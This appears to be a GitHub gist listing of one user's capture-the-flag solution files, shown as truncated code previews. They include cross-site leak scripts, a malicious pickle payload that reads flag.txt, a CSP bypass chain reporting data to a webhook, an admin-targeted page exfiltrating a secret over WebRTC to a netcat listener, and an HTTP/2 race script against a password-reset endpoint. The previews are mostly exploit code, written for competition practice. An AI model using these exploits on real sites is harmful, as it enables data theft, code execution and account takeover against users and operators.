strellic
/ justctf_computerationfixed.html
Created
January 31, 2021 19:35
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <body> | |
| <iframe src="https://computeration-fixed.web.jctf.pro/#" id="iframe"></iframe> | |
| <script> | |
| let iframe = document.getElementById("iframe"); | |
| let known = ""; | |
| let check = `[a-m]`; | |
| let gen = (c) => { |
strellic
/ notreceivedprize.js
Created
February 28, 2021 09:07
javascript solution for web notreceivedprize in aeroctf 2021
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| let fn = function() { | |
| async function x() { | |
| let r = await fetch(`/api/admin/pz/ex`, { method: `POST` }); | |
| let prob = (await r.json()).ex.split(' '); | |
| let a = parseInt(prob[0]), op = prob[1], b = parseInt(prob[2]); | |
| let ans = 0; | |
| if(op === '+') ans = a+b; | |
| if(op === '*') ans = a*b; | |
| if(op === '-') ans = a-b; | |
| if(op === '/') ans = a/b; |
strellic
/ ocf_shorturl.html
Last active
March 1, 2021 01:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <title>ocf.io shorturls</title> | |
| <link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet" crossorigin="anonymous"> | |
| </head> | |
| <body> | |
| <div class="m-3"> | |
| <h1>ocf.io short link translations</h1> | |
| <h5><a href="https://www.ocf.berkeley.edu/docs/">Documentation</a></h5> |
strellic
/ gurkburk.py
Last active
April 10, 2021 17:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import pickle | |
| import base64 | |
| import pickletools | |
| # basically, modify the pickle given to us by the challenge to include a note that comes from getattr(open("flag.txt"), "read")() | |
| payload = b'ccopy_reg\n_reconstructor\np0\n(c__main__\nNotes\np1\nc__builtin__\nobject\np2\nNtp3\nRp4\n(dp5\nVname\np6\nVMy notes\np7\nsVnotes\np8\n(lp9\nc__builtin__\ngetattr\n(c__builtin__\nopen\n(Vflag.txt\ntRp10\nVread\ntR)Rp11\nasb.' | |
| # pickletools.dis(payload) | |
| ''' | |
| 0: c GLOBAL 'copy_reg _reconstructor' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <body> | |
| <!-- | |
| make two pages, one with the meta tag, and the other with the form tag csp bypass | |
| set eval post id to the id of the meta tag | |
| at window.name at the bottom, run stage1 first. | |
| send the post that has the meta redirect to the admin | |
| this sends the file id of the service worker to a webhook, which you can then set as service worker file id. | |
| then, change it to run stage2 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <h1>yo</h1> | |
| <script> | |
| /* | |
| modify the webrtc host and ip to somewhere you have a netcat listener. | |
| send this html file to the admin, and then you should receive the secret wrapped in ZZZZZZs | |
| then send !secret <secret> and observe network requests for your flag! | |
| */ | |
| const SITE = "https://msgme.be.ax"; | |
| let webrtc_host = "IP"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const js2xmlparser = require('js2xmlparser'); | |
| const fs = require('fs'); | |
| const tmp = require('tmp'); | |
| const rimraf = require('rimraf'); | |
| const child_process = require('child_process'); | |
| function createFont(prefix, name, charsToLigature) { | |
| let font = { | |
| "defs": { | |
| "font": { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <iframe src="https://challenge-0922.intigriti.io/challenge/index.php" style="width:100vw; height: 100vh"></iframe> | |
| <script> | |
| document.querySelector("iframe").onload = () => { | |
| document.querySelector("iframe").contentWindow.frames[0].location = URL.createObjectURL(new Blob([` | |
| <script> | |
| (async () => { | |
| let alphabet = "0123456789abcdef".split(""); | |
| let known = ""; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // http2 muxer to race reset passcode | |
| const http2 = require('http2'); | |
| process.env["NODE_TLS_REJECT_UNAUTHORIZED"] = 0; | |
| const clientSession = http2.connect(process.argv[2]); | |
| for (let i = 0; i < 5; i++) { | |
| const r = clientSession.request({ | |
| ":method": "POST", | |
| ":path": "/api/request-reset", |
OlderNewer